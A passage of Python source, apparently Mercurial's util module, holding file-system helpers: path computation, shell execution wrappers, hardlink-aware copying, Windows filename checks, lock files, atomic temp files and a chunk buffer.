1039 1039 """
1040 1040 def wrapper(*args, **kwargs):
1041 1041 gcenabled = gc.isenabled()
1042 1042 gc.disable()
1043 1043 try:
1044 1044 return func(*args, **kwargs)
1045 1045 finally:
1046 1046 if gcenabled:
1047 1047 gc.enable()
1048 1048 return wrapper
1049 1049
1050 1050 if pycompat.ispypy:
1051 1051 # PyPy runs slower with gc disabled
1052 1052 nogc = lambda x: x
1053 1053
1054 1054 def pathto(root, n1, n2):
1055 1055 '''return the relative path from one place to another.
1056 1056 root should use os.sep to separate directories
1057 1057 n1 should use os.sep to separate directories
1058 1058 n2 should use "/" to separate directories
1059 1059 returns an os.sep-separated path.
1060 1060
1061 1061 If n1 is a relative path, it's assumed it's
1062 1062 relative to root.
1063 1063 n2 should always be relative to root.
1064 1064 '''
1065 1065 if not n1:
1066 1066 return localpath(n2)
1067 1067 if os.path.isabs(n1):
1068 1068 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1069 1069 return os.path.join(root, localpath(n2))
1070 1070 n2 = '/'.join((pconvert(root), n2))
1071 1071 a, b = splitpath(n1), n2.split('/')
1072 1072 a.reverse()
1073 1073 b.reverse()
1074 1074 while a and b and a[-1] == b[-1]:
1075 1075 a.pop()
1076 1076 b.pop()
1077 1077 b.reverse()
1078 1078 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1079 1079
1080 1080 def mainfrozen():
1081 1081 """return True if we are a frozen executable.
1082 1082
1083 1083 The code supports py2exe (most common, Windows only) and tools/freeze
1084 1084 (portable, not much used).
1085 1085 """
1086 1086 return (safehasattr(sys, "frozen") or # new py2exe
1087 1087 safehasattr(sys, "importers") or # old py2exe
1088 1088 imp.is_frozen(u"__main__")) # tools/freeze
1089 1089
1090 1090 # the location of data files matching the source code
1091 1091 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1092 1092 # executable version (py2exe) doesn't support __file__
1093 1093 datapath = os.path.dirname(pycompat.sysexecutable)
1094 1094 else:
1095 1095 datapath = os.path.dirname(pycompat.fsencode(__file__))
1096 1096
1097 1097 i18n.setdatapath(datapath)
1098 1098
1099 1099 _hgexecutable = None
1100 1100
1101 1101 def hgexecutable():
1102 1102 """return location of the 'hg' executable.
1103 1103
1104 1104 Defaults to $HG or 'hg' in the search path.
1105 1105 """
1106 1106 if _hgexecutable is None:
1107 1107 hg = encoding.environ.get('HG')
1108 1108 mainmod = sys.modules[pycompat.sysstr('__main__')]
1109 1109 if hg:
1110 1110 _sethgexecutable(hg)
1111 1111 elif mainfrozen():
1112 1112 if getattr(sys, 'frozen', None) == 'macosx_app':
1113 1113 # Env variable set by py2app
1114 1114 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1115 1115 else:
1116 1116 _sethgexecutable(pycompat.sysexecutable)
1117 1117 elif (os.path.basename(
1118 1118 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1119 1119 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1120 1120 else:
1121 1121 exe = findexe('hg') or os.path.basename(sys.argv[0])
1122 1122 _sethgexecutable(exe)
1123 1123 return _hgexecutable
1124 1124
1125 1125 def _sethgexecutable(path):
1126 1126 """set location of the 'hg' executable"""
1127 1127 global _hgexecutable
1128 1128 _hgexecutable = path
1129 1129
1130 1130 def _isstdout(f):
1131 1131 fileno = getattr(f, 'fileno', None)
1132 1132 return fileno and fileno() == sys.__stdout__.fileno()
1133 1133
1134 1134 def shellenviron(environ=None):
1135 1135 """return environ with optional override, useful for shelling out"""
1136 1136 def py2shell(val):
1137 1137 'convert python object into string that is useful to shell'
1138 1138 if val is None or val is False:
1139 1139 return '0'
1140 1140 if val is True:
1141 1141 return '1'
1142 1142 return str(val)
1143 1143 env = dict(encoding.environ)
1144 1144 if environ:
1145 1145 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1146 1146 env['HG'] = hgexecutable()
1147 1147 return env
1148 1148
1149 1149 def system(cmd, environ=None, cwd=None, out=None):
1150 1150 '''enhanced shell command execution.
1151 1151 run with environment maybe modified, maybe in different dir.
1152 1152
1153 1153 if out is specified, it is assumed to be a file-like object that has a
1154 1154 write() method. stdout and stderr will be redirected to out.'''
1155 1155 try:
1156 1156 stdout.flush()
1157 1157 except Exception:
1158 1158 pass
1159 1159 cmd = quotecommand(cmd)
1160 1160 env = shellenviron(environ)
1161 1161 if out is None or _isstdout(out):
1162 1162 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1163 1163 env=env, cwd=cwd)
1164 1164 else:
1165 1165 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1166 1166 env=env, cwd=cwd, stdout=subprocess.PIPE,
1167 1167 stderr=subprocess.STDOUT)
1168 1168 for line in iter(proc.stdout.readline, ''):
1169 1169 out.write(line)
1170 1170 proc.wait()
1171 1171 rc = proc.returncode
1172 1172 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1173 1173 rc = 0
1174 1174 return rc
1175 1175
1176 1176 def checksignature(func):
1177 1177 '''wrap a function with code to check for calling errors'''
1178 1178 def check(*args, **kwargs):
1179 1179 try:
1180 1180 return func(*args, **kwargs)
1181 1181 except TypeError:
1182 1182 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1183 1183 raise error.SignatureError
1184 1184 raise
1185 1185
1186 1186 return check
1187 1187
1188 1188 # a whilelist of known filesystems where hardlink works reliably
1189 1189 _hardlinkfswhitelist = {
1190 1190 'btrfs',
1191 1191 'ext2',
1192 1192 'ext3',
1193 1193 'ext4',
1194 1194 'hfs',
1195 1195 'jfs',
1196 1196 'reiserfs',
1197 1197 'tmpfs',
1198 1198 'ufs',
1199 1199 'xfs',
1200 1200 'zfs',
1201 1201 }
1202 1202
1203 1203 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1204 1204 '''copy a file, preserving mode and optionally other stat info like
1205 1205 atime/mtime
1206 1206
1207 1207 checkambig argument is used with filestat, and is useful only if
1208 1208 destination file is guarded by any lock (e.g. repo.lock or
1209 1209 repo.wlock).
1210 1210
1211 1211 copystat and checkambig should be exclusive.
1212 1212 '''
1213 1213 assert not (copystat and checkambig)
1214 1214 oldstat = None
1215 1215 if os.path.lexists(dest):
1216 1216 if checkambig:
1217 1217 oldstat = checkambig and filestat.frompath(dest)
1218 1218 unlink(dest)
1219 1219 if hardlink:
1220 1220 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1221 1221 # unless we are confident that dest is on a whitelisted filesystem.
1222 1222 try:
1223 1223 fstype = getfstype(os.path.dirname(dest))
1224 1224 except OSError:
1225 1225 fstype = None
1226 1226 if fstype not in _hardlinkfswhitelist:
1227 1227 hardlink = False
1228 1228 if hardlink:
1229 1229 try:
1230 1230 oslink(src, dest)
1231 1231 return
1232 1232 except (IOError, OSError):
1233 1233 pass # fall back to normal copy
1234 1234 if os.path.islink(src):
1235 1235 os.symlink(os.readlink(src), dest)
1236 1236 # copytime is ignored for symlinks, but in general copytime isn't needed
1237 1237 # for them anyway
1238 1238 else:
1239 1239 try:
1240 1240 shutil.copyfile(src, dest)
1241 1241 if copystat:
1242 1242 # copystat also copies mode
1243 1243 shutil.copystat(src, dest)
1244 1244 else:
1245 1245 shutil.copymode(src, dest)
1246 1246 if oldstat and oldstat.stat:
1247 1247 newstat = filestat.frompath(dest)
1248 1248 if newstat.isambig(oldstat):
1249 1249 # stat of copied file is ambiguous to original one
1250 1250 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1251 1251 os.utime(dest, (advanced, advanced))
1252 1252 except shutil.Error as inst:
1253 1253 raise Abort(str(inst))
1254 1254
1255 1255 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1256 1256 """Copy a directory tree using hardlinks if possible."""
1257 1257 num = 0
1258 1258
1259 1259 gettopic = lambda: hardlink and _('linking') or _('copying')
1260 1260
1261 1261 if os.path.isdir(src):
1262 1262 if hardlink is None:
1263 1263 hardlink = (os.stat(src).st_dev ==
1264 1264 os.stat(os.path.dirname(dst)).st_dev)
1265 1265 topic = gettopic()
1266 1266 os.mkdir(dst)
1267 1267 for name, kind in listdir(src):
1268 1268 srcname = os.path.join(src, name)
1269 1269 dstname = os.path.join(dst, name)
1270 1270 def nprog(t, pos):
1271 1271 if pos is not None:
1272 1272 return progress(t, pos + num)
1273 1273 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1274 1274 num += n
1275 1275 else:
1276 1276 if hardlink is None:
1277 1277 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1278 1278 os.stat(os.path.dirname(dst)).st_dev)
1279 1279 topic = gettopic()
1280 1280
1281 1281 if hardlink:
1282 1282 try:
1283 1283 oslink(src, dst)
1284 1284 except (IOError, OSError):
1285 1285 hardlink = False
1286 1286 shutil.copy(src, dst)
1287 1287 else:
1288 1288 shutil.copy(src, dst)
1289 1289 num += 1
1290 1290 progress(topic, num)
1291 1291 progress(topic, None)
1292 1292
1293 1293 return hardlink, num
1294 1294
1295 1295 _winreservednames = {
1296 1296 'con', 'prn', 'aux', 'nul',
1297 1297 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1298 1298 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1299 1299 }
1300 1300 _winreservedchars = ':*?"<>|'
1301 1301 def checkwinfilename(path):
1302 1302 r'''Check that the base-relative path is a valid filename on Windows.
1303 1303 Returns None if the path is ok, or a UI string describing the problem.
1304 1304
1305 1305 >>> checkwinfilename(b"just/a/normal/path")
1306 1306 >>> checkwinfilename(b"foo/bar/con.xml")
1307 1307 "filename contains 'con', which is reserved on Windows"
1308 1308 >>> checkwinfilename(b"foo/con.xml/bar")
1309 1309 "filename contains 'con', which is reserved on Windows"
1310 1310 >>> checkwinfilename(b"foo/bar/xml.con")
1311 1311 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1312 1312 "filename contains 'AUX', which is reserved on Windows"
1313 1313 >>> checkwinfilename(b"foo/bar/bla:.txt")
1314 1314 "filename contains ':', which is reserved on Windows"
1315 1315 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1316 1316 "filename contains '\\x07', which is invalid on Windows"
1317 1317 >>> checkwinfilename(b"foo/bar/bla ")
1318 1318 "filename ends with ' ', which is not allowed on Windows"
1319 1319 >>> checkwinfilename(b"../bar")
1320 1320 >>> checkwinfilename(b"foo\\")
1321 1321 "filename ends with '\\', which is invalid on Windows"
1322 1322 >>> checkwinfilename(b"foo\\/bar")
1323 1323 "directory name ends with '\\', which is invalid on Windows"
1324 1324 '''
1325 1325 if path.endswith('\\'):
1326 1326 return _("filename ends with '\\', which is invalid on Windows")
1327 1327 if '\\/' in path:
1328 1328 return _("directory name ends with '\\', which is invalid on Windows")
1329 1329 for n in path.replace('\\', '/').split('/'):
1330 1330 if not n:
1331 1331 continue
1332 1332 for c in _filenamebytestr(n):
1333 1333 if c in _winreservedchars:
1334 1334 return _("filename contains '%s', which is reserved "
1335 1335 "on Windows") % c
1336 1336 if ord(c) <= 31:
1337 1337 return _("filename contains '%s', which is invalid "
1338 1338 "on Windows") % escapestr(c)
1339 1339 base = n.split('.')[0]
1340 1340 if base and base.lower() in _winreservednames:
1341 1341 return _("filename contains '%s', which is reserved "
1342 1342 "on Windows") % base
1343 1343 t = n[-1:]
1344 1344 if t in '. ' and n not in '..':
1345 1345 return _("filename ends with '%s', which is not allowed "
1346 1346 "on Windows") % t
1347 1347
1348 1348 if pycompat.osname == 'nt':
1349 1349 checkosfilename = checkwinfilename
1350 1350 timer = time.clock
1351 1351 else:
1352 1352 checkosfilename = platform.checkosfilename
1353 1353 timer = time.time
1354 1354
1355 1355 if safehasattr(time, "perf_counter"):
1356 1356 timer = time.perf_counter
1357 1357
1358 1358 def makelock(info, pathname):
1359 1359 try:
1360 1360 return os.symlink(info, pathname)
1361 1361 except OSError as why:
1362 1362 if why.errno == errno.EEXIST:
1363 1363 raise
1364 1364 except AttributeError: # no symlink in os
1365 1365 pass
1366 1366
1367 1367 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1368 1368 os.write(ld, info)
1369 1369 os.close(ld)
1370 1370
1371 1371 def readlock(pathname):
1372 1372 try:
1373 1373 return os.readlink(pathname)
1374 1374 except OSError as why:
1375 1375 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1376 1376 raise
1377 1377 except AttributeError: # no symlink in os
1378 1378 pass
1379 1379 fp = posixfile(pathname)
1380 1380 r = fp.read()
1381 1381 fp.close()
1382 1382 return r
1383 1383
1384 1384 def fstat(fp):
1385 1385 '''stat file object that may not have fileno method.'''
1386 1386 try:
1387 1387 return os.fstat(fp.fileno())
1388 1388 except AttributeError:
1389 1389 return os.stat(fp.name)
1390 1390
1391 1391 # File system features
1392 1392
1393 1393 def fscasesensitive(path):
1394 1394 """
1395 1395 Return true if the given path is on a case-sensitive filesystem
1396 1396
1397 1397 Requires a path (like /foo/.hg) ending with a foldable final
1398 1398 directory component.
1399 1399 """
1400 1400 s1 = os.lstat(path)
1401 1401 d, b = os.path.split(path)
1402 1402 b2 = b.upper()
1403 1403 if b == b2:
1404 1404 b2 = b.lower()
1405 1405 if b == b2:
1406 1406 return True # no evidence against case sensitivity
1407 1407 p2 = os.path.join(d, b2)
1408 1408 try:
1409 1409 s2 = os.lstat(p2)
1410 1410 if s2 == s1:
1411 1411 return False
1412 1412 return True
1413 1413 except OSError:
1414 1414 return True
1415 1415
1416 1416 try:
1417 1417 import re2
1418 1418 _re2 = None
1419 1419 except ImportError:
1420 1420 _re2 = False
1421 1421
1422 1422 class _re(object):
1423 1423 def _checkre2(self):
1424 1424 global _re2
1425 1425 try:
1426 1426 # check if match works, see issue3964
1427 1427 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1428 1428 except ImportError:
1429 1429 _re2 = False
1430 1430
1431 1431 def compile(self, pat, flags=0):
1432 1432 '''Compile a regular expression, using re2 if possible
1433 1433
1434 1434 For best performance, use only re2-compatible regexp features. The
1435 1435 only flags from the re module that are re2-compatible are
1436 1436 IGNORECASE and MULTILINE.'''
1437 1437 if _re2 is None:
1438 1438 self._checkre2()
1439 1439 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1440 1440 if flags & remod.IGNORECASE:
1441 1441 pat = '(?i)' + pat
1442 1442 if flags & remod.MULTILINE:
1443 1443 pat = '(?m)' + pat
1444 1444 try:
1445 1445 return re2.compile(pat)
1446 1446 except re2.error:
1447 1447 pass
1448 1448 return remod.compile(pat, flags)
1449 1449
1450 1450 @propertycache
1451 1451 def escape(self):
1452 1452 '''Return the version of escape corresponding to self.compile.
1453 1453
1454 1454 This is imperfect because whether re2 or re is used for a particular
1455 1455 function depends on the flags, etc, but it's the best we can do.
1456 1456 '''
1457 1457 global _re2
1458 1458 if _re2 is None:
1459 1459 self._checkre2()
1460 1460 if _re2:
1461 1461 return re2.escape
1462 1462 else:
1463 1463 return remod.escape
1464 1464
1465 1465 re = _re()
1466 1466
1467 1467 _fspathcache = {}
1468 1468 def fspath(name, root):
1469 1469 '''Get name in the case stored in the filesystem
1470 1470
1471 1471 The name should be relative to root, and be normcase-ed for efficiency.
1472 1472
1473 1473 Note that this function is unnecessary, and should not be
1474 1474 called, for case-sensitive filesystems (simply because it's expensive).
1475 1475
1476 1476 The root should be normcase-ed, too.
1477 1477 '''
1478 1478 def _makefspathcacheentry(dir):
1479 1479 return dict((normcase(n), n) for n in os.listdir(dir))
1480 1480
1481 1481 seps = pycompat.ossep
1482 1482 if pycompat.osaltsep:
1483 1483 seps = seps + pycompat.osaltsep
1484 1484 # Protect backslashes. This gets silly very quickly.
1485 1485 seps.replace('\\','\\\\')
1486 1486 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1487 1487 dir = os.path.normpath(root)
1488 1488 result = []
1489 1489 for part, sep in pattern.findall(name):
1490 1490 if sep:
1491 1491 result.append(sep)
1492 1492 continue
1493 1493
1494 1494 if dir not in _fspathcache:
1495 1495 _fspathcache[dir] = _makefspathcacheentry(dir)
1496 1496 contents = _fspathcache[dir]
1497 1497
1498 1498 found = contents.get(part)
1499 1499 if not found:
1500 1500 # retry "once per directory" per "dirstate.walk" which
1501 1501 # may take place for each patches of "hg qpush", for example
1502 1502 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1503 1503 found = contents.get(part)
1504 1504
1505 1505 result.append(found or part)
1506 1506 dir = os.path.join(dir, part)
1507 1507
1508 1508 return ''.join(result)
1509 1509
1510 1510 def getfstype(dirpath):
1511 1511 '''Get the filesystem type name from a directory (best-effort)
1512 1512
1513 1513 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1514 1514 '''
1515 1515 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1516 1516
1517 1517 def checknlink(testfile):
1518 1518 '''check whether hardlink count reporting works properly'''
1519 1519
1520 1520 # testfile may be open, so we need a separate file for checking to
1521 1521 # work around issue2543 (or testfile may get lost on Samba shares)
1522 1522 f1, f2, fp = None, None, None
1523 1523 try:
1524 1524 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1525 1525 suffix='1~', dir=os.path.dirname(testfile))
1526 1526 os.close(fd)
1527 1527 f2 = '%s2~' % f1[:-2]
1528 1528
1529 1529 oslink(f1, f2)
1530 1530 # nlinks() may behave differently for files on Windows shares if
1531 1531 # the file is open.
1532 1532 fp = posixfile(f2)
1533 1533 return nlinks(f2) > 1
1534 1534 except OSError:
1535 1535 return False
1536 1536 finally:
1537 1537 if fp is not None:
1538 1538 fp.close()
1539 1539 for f in (f1, f2):
1540 1540 try:
1541 1541 if f is not None:
1542 1542 os.unlink(f)
1543 1543 except OSError:
1544 1544 pass
1545 1545
1546 1546 def endswithsep(path):
1547 1547 '''Check path ends with os.sep or os.altsep.'''
1548 1548 return (path.endswith(pycompat.ossep)
1549 1549 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1550 1550
1551 1551 def splitpath(path):
1552 1552 '''Split path by os.sep.
1553 1553 Note that this function does not use os.altsep because this is
1554 1554 an alternative of simple "xxx.split(os.sep)".
1555 1555 It is recommended to use os.path.normpath() before using this
1556 1556 function if need.'''
1557 1557 return path.split(pycompat.ossep)
1558 1558
1559 1559 def gui():
1560 1560 '''Are we running in a GUI?'''
1561 1561 if pycompat.sysplatform == 'darwin':
1562 1562 if 'SSH_CONNECTION' in encoding.environ:
1563 1563 # handle SSH access to a box where the user is logged in
1564 1564 return False
1565 1565 elif getattr(osutil, 'isgui', None):
1566 1566 # check if a CoreGraphics session is available
1567 1567 return osutil.isgui()
1568 1568 else:
1569 1569 # pure build; use a safe default
1570 1570 return True
1571 1571 else:
1572 1572 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1573 1573
1574 1574 def mktempcopy(name, emptyok=False, createmode=None):
1575 1575 """Create a temporary file with the same contents from name
1576 1576
1577 1577 The permission bits are copied from the original file.
1578 1578
1579 1579 If the temporary file is going to be truncated immediately, you
1580 1580 can use emptyok=True as an optimization.
1581 1581
1582 1582 Returns the name of the temporary file.
1583 1583 """
1584 1584 d, fn = os.path.split(name)
1585 1585 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1586 1586 os.close(fd)
1587 1587 # Temporary files are created with mode 0600, which is usually not
1588 1588 # what we want. If the original file already exists, just copy
1589 1589 # its mode. Otherwise, manually obey umask.
1590 1590 copymode(name, temp, createmode)
1591 1591 if emptyok:
1592 1592 return temp
1593 1593 try:
1594 1594 try:
1595 1595 ifp = posixfile(name, "rb")
1596 1596 except IOError as inst:
1597 1597 if inst.errno == errno.ENOENT:
1598 1598 return temp
1599 1599 if not getattr(inst, 'filename', None):
1600 1600 inst.filename = name
1601 1601 raise
1602 1602 ofp = posixfile(temp, "wb")
1603 1603 for chunk in filechunkiter(ifp):
1604 1604 ofp.write(chunk)
1605 1605 ifp.close()
1606 1606 ofp.close()
1607 1607 except: # re-raises
1608 1608 try: os.unlink(temp)
1609 1609 except OSError: pass
1610 1610 raise
1611 1611 return temp
1612 1612
1613 1613 class filestat(object):
1614 1614 """help to exactly detect change of a file
1615 1615
1616 1616 'stat' attribute is result of 'os.stat()' if specified 'path'
1617 1617 exists. Otherwise, it is None. This can avoid preparative
1618 1618 'exists()' examination on client side of this class.
1619 1619 """
1620 1620 def __init__(self, stat):
1621 1621 self.stat = stat
1622 1622
1623 1623 @classmethod
1624 1624 def frompath(cls, path):
1625 1625 try:
1626 1626 stat = os.stat(path)
1627 1627 except OSError as err:
1628 1628 if err.errno != errno.ENOENT:
1629 1629 raise
1630 1630 stat = None
1631 1631 return cls(stat)
1632 1632
1633 1633 @classmethod
1634 1634 def fromfp(cls, fp):
1635 1635 stat = os.fstat(fp.fileno())
1636 1636 return cls(stat)
1637 1637
1638 1638 __hash__ = object.__hash__
1639 1639
1640 1640 def __eq__(self, old):
1641 1641 try:
1642 1642 # if ambiguity between stat of new and old file is
1643 1643 # avoided, comparison of size, ctime and mtime is enough
1644 1644 # to exactly detect change of a file regardless of platform
1645 1645 return (self.stat.st_size == old.stat.st_size and
1646 1646 self.stat.st_ctime == old.stat.st_ctime and
1647 1647 self.stat.st_mtime == old.stat.st_mtime)
1648 1648 except AttributeError:
1649 1649 pass
1650 1650 try:
1651 1651 return self.stat is None and old.stat is None
1652 1652 except AttributeError:
1653 1653 return False
1654 1654
1655 1655 def isambig(self, old):
1656 1656 """Examine whether new (= self) stat is ambiguous against old one
1657 1657
1658 1658 "S[N]" below means stat of a file at N-th change:
1659 1659
1660 1660 - S[n-1].ctime < S[n].ctime: can detect change of a file
1661 1661 - S[n-1].ctime == S[n].ctime
1662 1662 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1663 1663 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1664 1664 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1665 1665 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1666 1666
1667 1667 Case (*2) above means that a file was changed twice or more at
1668 1668 same time in sec (= S[n-1].ctime), and comparison of timestamp
1669 1669 is ambiguous.
1670 1670
1671 1671 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1672 1672 timestamp is ambiguous".
1673 1673
1674 1674 But advancing mtime only in case (*2) doesn't work as
1675 1675 expected, because naturally advanced S[n].mtime in case (*1)
1676 1676 might be equal to manually advanced S[n-1 or earlier].mtime.
1677 1677
1678 1678 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1679 1679 treated as ambiguous regardless of mtime, to avoid overlooking
1680 1680 by confliction between such mtime.
1681 1681
1682 1682 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1683 1683 S[n].mtime", even if size of a file isn't changed.
1684 1684 """
1685 1685 try:
1686 1686 return (self.stat.st_ctime == old.stat.st_ctime)
1687 1687 except AttributeError:
1688 1688 return False
1689 1689
1690 1690 def avoidambig(self, path, old):
1691 1691 """Change file stat of specified path to avoid ambiguity
1692 1692
1693 1693 'old' should be previous filestat of 'path'.
1694 1694
1695 1695 This skips avoiding ambiguity, if a process doesn't have
1696 1696 appropriate privileges for 'path'. This returns False in this
1697 1697 case.
1698 1698
1699 1699 Otherwise, this returns True, as "ambiguity is avoided".
1700 1700 """
1701 1701 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1702 1702 try:
1703 1703 os.utime(path, (advanced, advanced))
1704 1704 except OSError as inst:
1705 1705 if inst.errno == errno.EPERM:
1706 1706 # utime() on the file created by another user causes EPERM,
1707 1707 # if a process doesn't have appropriate privileges
1708 1708 return False
1709 1709 raise
1710 1710 return True
1711 1711
1712 1712 def __ne__(self, other):
1713 1713 return not self == other
1714 1714
1715 1715 class atomictempfile(object):
1716 1716 '''writable file object that atomically updates a file
1717 1717
1718 1718 All writes will go to a temporary copy of the original file. Call
1719 1719 close() when you are done writing, and atomictempfile will rename
1720 1720 the temporary copy to the original name, making the changes
1721 1721 visible. If the object is destroyed without being closed, all your
1722 1722 writes are discarded.
1723 1723
1724 1724 checkambig argument of constructor is used with filestat, and is
1725 1725 useful only if target file is guarded by any lock (e.g. repo.lock
1726 1726 or repo.wlock).
1727 1727 '''
1728 1728 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1729 1729 self.__name = name # permanent name
1730 1730 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1731 1731 createmode=createmode)
1732 1732 self._fp = posixfile(self._tempname, mode)
1733 1733 self._checkambig = checkambig
1734 1734
1735 1735 # delegated methods
1736 1736 self.read = self._fp.read
1737 1737 self.write = self._fp.write
1738 1738 self.seek = self._fp.seek
1739 1739 self.tell = self._fp.tell
1740 1740 self.fileno = self._fp.fileno
1741 1741
1742 1742 def close(self):
1743 1743 if not self._fp.closed:
1744 1744 self._fp.close()
1745 1745 filename = localpath(self.__name)
1746 1746 oldstat = self._checkambig and filestat.frompath(filename)
1747 1747 if oldstat and oldstat.stat:
1748 1748 rename(self._tempname, filename)
1749 1749 newstat = filestat.frompath(filename)
1750 1750 if newstat.isambig(oldstat):
1751 1751 # stat of changed file is ambiguous to original one
1752 1752 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1753 1753 os.utime(filename, (advanced, advanced))
1754 1754 else:
1755 1755 rename(self._tempname, filename)
1756 1756
1757 1757 def discard(self):
1758 1758 if not self._fp.closed:
1759 1759 try:
1760 1760 os.unlink(self._tempname)
1761 1761 except OSError:
1762 1762 pass
1763 1763 self._fp.close()
1764 1764
1765 1765 def __del__(self):
1766 1766 if safehasattr(self, '_fp'): # constructor actually did something
1767 1767 self.discard()
1768 1768
1769 1769 def __enter__(self):
1770 1770 return self
1771 1771
1772 1772 def __exit__(self, exctype, excvalue, traceback):
1773 1773 if exctype is not None:
1774 1774 self.discard()
1775 1775 else:
1776 1776 self.close()
1777 1777
1778 1778 def unlinkpath(f, ignoremissing=False):
1779 1779 """unlink and remove the directory if it is empty"""
1780 1780 if ignoremissing:
1781 1781 tryunlink(f)
1782 1782 else:
1783 1783 unlink(f)
1784 1784 # try removing directories that might now be empty
1785 1785 try:
1786 1786 removedirs(os.path.dirname(f))
1787 1787 except OSError:
1788 1788 pass
1789 1789
1790 1790 def tryunlink(f):
1791 1791 """Attempt to remove a file, ignoring ENOENT errors."""
1792 1792 try:
1793 1793 unlink(f)
1794 1794 except OSError as e:
1795 1795 if e.errno != errno.ENOENT:
1796 1796 raise
1797 1797
1798 1798 def makedirs(name, mode=None, notindexed=False):
1799 1799 """recursive directory creation with parent mode inheritance
1800 1800
1801 1801 Newly created directories are marked as "not to be indexed by
1802 1802 the content indexing service", if ``notindexed`` is specified
1803 1803 for "write" mode access.
1804 1804 """
1805 1805 try:
1806 1806 makedir(name, notindexed)
1807 1807 except OSError as err:
1808 1808 if err.errno == errno.EEXIST:
1809 1809 return
1810 1810 if err.errno != errno.ENOENT or not name:
1811 1811 raise
1812 1812 parent = os.path.dirname(os.path.abspath(name))
1813 1813 if parent == name:
1814 1814 raise
1815 1815 makedirs(parent, mode, notindexed)
1816 1816 try:
1817 1817 makedir(name, notindexed)
1818 1818 except OSError as err:
1819 1819 # Catch EEXIST to handle races
1820 1820 if err.errno == errno.EEXIST:
1821 1821 return
1822 1822 raise
1823 1823 if mode is not None:
1824 1824 os.chmod(name, mode)
1825 1825
1826 1826 def readfile(path):
1827 1827 with open(path, 'rb') as fp:
1828 1828 return fp.read()
1829 1829
1830 1830 def writefile(path, text):
1831 1831 with open(path, 'wb') as fp:
1832 1832 fp.write(text)
1833 1833
1834 1834 def appendfile(path, text):
1835 1835 with open(path, 'ab') as fp:
1836 1836 fp.write(text)
1837 1837
1838 1838 class chunkbuffer(object):
1839 1839 """Allow arbitrary sized chunks of data to be efficiently read from an
1840 1840 iterator over chunks of arbitrary size."""
1841 1841
1842 1842 def __init__(self, in_iter):
1843 1843 """in_iter is the iterator that's iterating over the input chunks."""
1844 1844 def splitbig(chunks):
1845 1845 for chunk in chunks:
1846 1846 if len(chunk) > 2**20:
1847 1847 pos = 0
1848 1848 while pos < len(chunk):
1849 1849 end = pos + 2 ** 18
1850 1850 yield chunk[pos:end]
1851 1851 pos = end
1852 1852 else:
1853 1853 yield chunk
1854 1854 self.iter = splitbig(in_iter)
1855 1855 self._queue = collections.deque()
1856 1856 self._chunkoffset = 0
1857 1857
1858 1858 def read(self, l=None):
1859 1859 """Read L bytes of data from the iterator of chunks of data.
1860 1860 Returns less than L bytes if the iterator runs dry.
1861 1861
1862 1862 If size parameter is omitted, read everything"""
1863 1863 if l is None:
1864 1864 return ''.join(self.iter)
1865 1865
1866 1866 left = l
1867 1867 buf = []
1868 1868 queue = self._queue
1869 1869 while left > 0:
1870 1870 # refill the queue
1871 1871 if not queue:
1872 1872 target = 2**18
1873 1873 for chunk in self.iter:
1874 1874 queue.append(chunk)
1875 1875 target -= len(chunk)
1876 1876 if target <= 0:
1877 1877 break
1878 1878 if not queue:
1879 1879 break
1880 1880
1881 1881 # The easy way to do this would be to queue.popleft(), modify the
1882 1882 # chunk (if necessary), then queue.appendleft(). However, for cases
1883 1883 # where we read partial chunk content, this incurs 2 dequeue
1884 1884 # mutations and creates a new str for the remaining chunk in the
1885 1885 # queue. Our code below avoids this overhead.
1886 1886
1887 1887 chunk = queue[0]
1888 1888 chunkl = len(chunk)
1889 1889 offset = self._chunkoffset
1890 1890
1891 1891 # Use full chunk.
1892 1892 if offset == 0 and left >= chunkl:
1893 1893 left -= chunkl
1894 1894 queue.popleft()
1895 1895 buf.append(chunk)
1896 1896 # self._chunkoffset remains at 0.
1897 1897 continue
1898 1898
